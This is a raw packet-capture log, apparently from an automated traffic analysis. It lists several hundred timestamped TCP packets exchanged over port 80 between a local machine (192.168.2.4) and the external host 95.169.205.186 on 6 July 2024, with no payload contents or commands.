                                                              Jul 6, 2024 04:22:00.240681887 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240691900 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240696907 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.240704060 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240714073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240725040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240725040 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.240736008 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.240736961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240750074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240756989 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.240760088 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240772009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240782976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.240788937 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.240804911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.240828037 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.241430044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.241441011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.241450071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.241461039 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.241471052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.241480112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.241482973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.241494894 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.241503000 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.241514921 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.241533995 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.325556993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325618029 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325625896 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.325628042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325651884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325654030 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.325663090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325673103 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.325690985 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.325699091 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.325794935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325808048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325819016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325830936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.325834036 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.325845957 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.325905085 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326035976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326047897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326056957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326070070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326080084 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326081038 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326091051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326101065 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326112986 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326137066 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326314926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326327085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326337099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326347113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326356888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326366901 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326369047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326381922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326394081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326415062 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326632977 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326642990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326653004 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326663017 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326673985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326678991 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326685905 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326697111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326714039 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326739073 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.326944113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326957941 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326975107 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326986074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.326991081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.327001095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.327012062 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.327016115 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.327024937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.327033997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.327039003 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.327044010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.327055931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.327065945 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.327066898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.327078104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.327080011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.327106953 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.346327066 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.351581097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.570946932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.570966005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.570975065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571017027 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571055889 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571105957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571116924 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571126938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571136951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571145058 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571168900 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571192980 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571336031 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571348906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571357965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571394920 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571408033 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571563959 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571573973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571583986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571594000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571604967 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571604967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571624994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571628094 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571636915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571647882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571654081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571703911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571881056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571891069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.571918964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.571938038 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572033882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572047949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572057009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572067976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572072029 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572079897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572092056 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572093010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572104931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572117090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572118998 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572128057 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572139025 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572144032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572153091 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572181940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572714090 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572725058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572741032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572751045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572761059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572761059 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572772980 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572783947 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572793007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572797060 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572804928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572817087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572819948 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572828054 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572839022 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572846889 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572849989 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572861910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572873116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572875023 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572884083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572895050 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572896957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572909117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.572909117 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572938919 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.572959900 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.573494911 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573506117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573514938 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573545933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.573570967 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.573577881 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573590040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573601007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573611975 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573616982 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.573623896 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573632956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.573636055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573647976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.573659897 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.573678017 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.574148893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.574158907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.574168921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.574178934 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.574191093 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.574199915 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.574203968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.574217081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.574222088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.574229002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.574240923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.574254036 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.574280977 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.660761118 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.660813093 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.672668934 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.679343939 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.949625015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.949645042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.949655056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.949697971 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.949727058 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.949748993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.949790001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.949807882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.949820042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.949831009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.949851990 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.949876070 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.949975967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950021029 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950155973 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950169086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950179100 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950190067 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950201035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950211048 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950213909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950222969 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950226068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950237989 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950243950 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950254917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950269938 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950294018 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950612068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950623989 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950633049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950644970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950656891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950664997 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950669050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950681925 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950690985 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950710058 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950732946 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950741053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950751066 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950759888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950769901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950779915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950782061 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950793028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950803995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950809956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950818062 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950826883 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950834990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950841904 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950848103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.950864077 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950875044 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.950894117 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951586962 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951598883 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951607943 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951617956 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951627970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951637030 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951638937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951651096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951666117 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951669931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951679945 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951682091 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951694012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951705933 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951705933 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951716900 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951726913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951733112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951739073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951744080 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951750994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951761961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951771975 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951772928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951785088 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.951796055 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951811075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.951836109 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952605009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952615023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952622890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952639103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952650070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952650070 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952661991 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952663898 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952675104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952683926 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952686071 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952694893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952706099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952711105 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952716112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952722073 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952728033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952739954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952749968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952749968 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952764034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952771902 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952775955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952788115 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952790022 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952799082 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952811003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.952825069 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952837944 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.952856064 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953500032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953511000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953521013 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953531981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953547001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953547001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953567982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953572035 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953581095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953591108 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953593969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953604937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953615904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953618050 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953627110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953638077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953640938 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953650951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953661919 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953663111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953674078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953675032 CEST4973080192.168.2.495.169.205.186
